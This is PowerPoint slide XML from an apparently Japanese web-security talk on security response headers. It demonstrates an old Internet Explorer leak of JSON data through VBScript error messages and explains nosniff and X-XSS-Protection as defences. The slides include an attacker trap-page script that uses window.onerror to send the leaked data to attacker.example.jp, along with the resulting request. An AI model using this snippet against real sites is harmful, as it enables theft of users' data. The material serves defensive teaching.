        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4067944" y="4758321"/>
            <a:ext cx="1785950" cy="1714512"/>
            <a:chOff x="5214942" y="928670"/>
            <a:chExt cx="1785950" cy="1714512"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="正方形/長方形 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5929322" y="1142984"/>
              <a:ext cx="214314" cy="857256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直角三角形 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5929322" y="928670"/>
              <a:ext cx="214314" cy="214314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5286380" y="928670"/>
              <a:ext cx="642942" cy="1071570"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="FFFFCC"/>
                </a:gs>
                <a:gs pos="6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/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5286380" y="928670"/>
              <a:ext cx="642942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rot="5400000" flipH="1" flipV="1">
              <a:off x="5822165" y="1035827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/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="5929322" y="1142984"/>
              <a:ext cx="214314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stCxn id="14" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000" flipH="1">
              <a:off x="5929322" y="928670"/>
              <a:ext cx="214314" cy="21431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パイ 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5286380" y="1357298"/>
              <a:ext cx="1714512" cy="1285884"/>
            </a:xfrm>
            <a:prstGeom prst="pie">
              <a:avLst>
                <a:gd name="adj1" fmla="val 10847254"/>
                <a:gd name="adj2" fmla="val 16200000"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="FFC000">
                    <a:tint val="66000"/>
                    <a:satMod val="160000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="50000">
                  <a:srgbClr val="FFC000">
                    <a:tint val="44500"/>
                    <a:satMod val="160000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="FFC000">
                    <a:tint val="23500"/>
                    <a:satMod val="160000"/>
                  </a:srgb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21" name="直線コネクタ 20"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5429256" y="1700200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コネクタ 21"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5286380" y="2000240"/>
              <a:ext cx="857256" cy="1588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rot="5400000">
              <a:off x="5719770" y="1566850"/>
              <a:ext cx="857256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/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="4755357" y="1459693"/>
              <a:ext cx="1071570" cy="9524"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="B08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/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5429256" y="1914514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5429256" y="1485886"/>
              <a:ext cx="571504" cy="1588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テキスト ボックス 26"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5214942" y="1181083"/>
              <a:ext cx="1000132" cy="276999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kumimoji="1" lang="en-US" altLang="ja-JP" sz="2000" b="1" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0070C0"/>
                  </a:solidFill>
                  <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
                  <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
                </a:rPr>
                <a:t>JSON</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="曲折矢印 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4716016" y="4038241"/>
            <a:ext cx="2319419" cy="621877"/>
          </a:xfrm>
          <a:prstGeom prst="bentArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 34369"/>
              <a:gd name="adj2" fmla="val 29142"/>
              <a:gd name="adj3" fmla="val 27342"/>
              <a:gd name="adj4" fmla="val 43750"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E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3678201"/>
            <a:ext cx="1368152" cy="1368152"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="コンテンツ プレースホルダ 6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 rot="190717" flipH="1">
            <a:off x="7290638" y="3859426"/>
            <a:ext cx="540353" cy="627849"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:scene3d>
            <a:camera prst="isometricOffAxis1Left">
              <a:rot lat="881243" lon="118930" rev="146286"/>
            </a:camera>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="テキスト ボックス 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="2636912"/>
            <a:ext cx="7560840" cy="923330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//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>罠ページ内で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script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ソースとして読み込む</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP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&lt;script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src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="http://example.jp/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target.json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"&gt;&lt;/script&gt;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&lt;script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src</a:t>
            </a:r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="http://example.jp/target.csv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"&gt;&lt;/script&gt;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76345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smtClean="0"/>
              <a:t>XHR: Ajax</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>データ内の機密情報漏えい</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US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JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>配列を</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>VBScript</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>として読み込む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失敗→エラーメッセージに配列の内容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1600" y="2636912"/>
            <a:ext cx="7560840" cy="1200329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application/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 charset=utf-8</a:t>
            </a:r>
          </a:p>
          <a:p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[ "secret", "message", "is", "here" ]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3999" y="3981782"/>
            <a:ext cx="7560840" cy="923330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//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>　攻撃者の用意した罠ページ</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="92D050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&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=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"http://example.jp/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target.json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"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Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>language=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"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vbscript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"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&gt;&lt;/script&gt;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926280"/>
            <a:ext cx="6381017" cy="8640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111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XHR: Ajax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>データ内の機密情報漏えい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r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>配列を</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>VBScript</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>として読み込み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エラーメッセージに配列の内容が含まれる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 smtClean="0"/>
              <a:t>→</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1" smtClean="0"/>
              <a:t>window.onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>で捕捉</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP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25960" y="4904000"/>
            <a:ext cx="7560840" cy="1477328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GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r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://attacker.example.jp/log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>型が一致しません。</a:t>
            </a:r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:%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>20</a:t>
            </a:r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'</a:t>
            </a:r>
            <a:b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</a:br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%20"secret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>",%20"message",%20"is",%20"here"%20</a:t>
            </a:r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' HTTP/1.1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p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Referer</a:t>
            </a:r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: http://example.jp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/</a:t>
            </a:r>
          </a:p>
          <a:p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User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Consolas" pitchFamily="49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15616" y="2479336"/>
            <a:ext cx="7560840" cy="2308324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&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p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window.onerror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= function( e ){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document.getElementById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( "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img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" ).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setAttribute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(</a:t>
            </a:r>
          </a:p>
          <a:p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      "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src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", "http://attacker.example.jp/log?" + e );</a:t>
            </a:r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}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&lt;/script&gt;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&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=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"http://example.jp/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target.json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"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srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>language=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"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vbscript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"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&gt;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="135318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92696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>XHR: Ajax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>データ内の機密情報漏えい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対策</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>X-Content-Type-Options</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>を付ける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600" y="2732727"/>
            <a:ext cx="7560840" cy="1477328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application/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 charset=utf-8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X-Content-Type-Options: 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nosniff</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p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>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[ "secret", "message", "is", "here" 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]</a:t>
            </a:r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4437112"/>
            <a:ext cx="7776864" cy="6518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472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セキュリティ関係のレスポンスヘッダ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96344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セキュリティ関係のレスポンスヘッダ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使</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>いこなすことでよりセキュアに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X-XSS-Protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>X-Content-Type-Options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>X-Frame-Options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>Content-Security-Policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>X-Download-Options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>Strict-Transport-Security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00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セキュリティ関係の</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>レスポンスヘッダ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X-XSS-Protection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626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お知らせ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923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X-XSS-Protection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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>保護機能の制御</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" err="1" smtClean="0"/>
              <a:t>IE,Chrome,Opera,Safari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>で有効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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>保護機能をそのページのみ無効にする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 smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>保護機能を明示的に有効にする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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>デフォルト有効になっている</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>保護機能を有効にし、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>検知時に空白画面を表示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3131676"/>
            <a:ext cx="6768752" cy="369332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X-XSS-Protection: 0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643844"/>
            <a:ext cx="6768752" cy="369332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X-XSS-Protection: 1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6011996"/>
            <a:ext cx="6768752" cy="369332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X-XSS-Protection: 1; mode=block</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="345621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X-XSS-Protection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r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>「</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>フィルターを無効に設定」やめて！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3203" y="1700808"/>
            <a:ext cx="7381685" cy="482453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843808" y="3501008"/>
            <a:ext cx="3312368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923928" y="4293096"/>
            <a:ext cx="2520280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3131840" y="5335760"/>
            <a:ext cx="1944216" cy="181471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2843809" y="6093295"/>
            <a:ext cx="3816424" cy="315416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88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X-XSS-Protection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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>フィルターの誤検知のエラーを消すには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該当ページに</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>がないか慎重に検査し</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>たうえで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そのページのみ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>X-XSS-Protection:0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>を指定</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>ブラウザの設定変更を指示しないで！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6570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セキュリティ関係の</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>レスポンスヘッダ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X-Content-Type-Options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0309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X-Content-Type-Options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r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>Content-Type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>を厳格に扱う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非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HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>扱いしない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smtClean="0"/>
              <a:t>JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>や</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>CSV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>による</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>の防止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/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>非</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>JS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>を</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>として読み込まない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script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>経由での情報漏えい防止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Firefox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Chrome</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>などでも。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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5157192"/>
            <a:ext cx="7560840" cy="1200329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application/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 charset=utf-8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X-Content-Type-Options: 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nosniff</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ja-JP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[ "secret", "message", "is", "here" ]</a:t>
            </a:r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2516703"/>
            <a:ext cx="7560840" cy="1200329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application/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 charset=utf-8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X-Content-Type-Options: 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nosniff</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ja-JP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{ "message", "&lt;script&gt;alert(1)&lt;/script&gt;" }</a:t>
            </a:r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X-Content-Type-Options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副作用はほとんどないので、全コンテンツにつけるべき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稀有な副作用例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>P/JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>で共通処理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4571836"/>
            <a:ext cx="7560840" cy="1200329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application/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 charset=utf-8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="66FFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>X-Content-Type-Options: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="66FFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nosniff</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="66FFFF"/>
              </a:solidFill>
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ja-JP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callback( { "message", "&lt;script&gt;alert(1)&lt;/script&gt;" } )</a:t>
            </a:r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3140968"/>
            <a:ext cx="7560840" cy="1200329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application/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json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; charset=utf-8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="66FFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>X-Content-Type-Options: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="66FFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nosniff</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="66FFFF"/>
              </a:solidFill>
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
